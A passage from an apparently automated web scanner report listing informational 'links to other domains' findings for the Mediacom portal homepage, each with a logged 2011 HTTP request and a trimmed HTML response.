Content-Length: 134951
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=7" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;6101b50f;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;b77bb82b;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/30.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" href="http://www.mediacomcable.com/internet_security.html" title="CA Internet Security"><img src="/cmsimages/CA_promo.jpg" alt="CA Internet Security" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.12. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=1 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_cc=true; s_nr=1313344950958; dslv=1313344950990; dslv_s=First%20Visit; s_vnum=1315936950998%26vn%3D1; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 18:31:18 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 135453
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=2" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;62dcd259;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;688e01fd;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/30.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" onclick="Syn.Tracking.tl(this, 'o', 'ufc133');" href="http://www.ufc.com/event/UFC133#/fight" title="UFC 133"><img src="/cmsimages/UFC133_promo.jpg" alt="UFC 133" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.13. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=30 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=29
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313395580588; dslv=1313395580589; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 08:35:20 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 132342
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=31" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;9a84b3f3;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;0a720b96;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/29.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" href="http://www.americanwebinc.com/AW_Flip_Books/Pause/Issue_15/index.html" title="Pause"><img src="/cmsimages/Pause_promo.jpg" alt="Pause" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.14. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=3 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313348443950; dslv=1313348443951; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 19:29:28 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 135542
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=4" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;5793ba78;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;2d813ddb;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/30.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" href="http://www.mediacomcable.com/internet_security.html" title="CA Internet Security"><img src="/cmsimages/CA_promo.jpg" alt="CA Internet Security" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.15. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=11 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=10
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313362413862; dslv=1313362413863; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 23:22:12 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 134989
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=12" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;d73f3adc;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;a5152b80;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
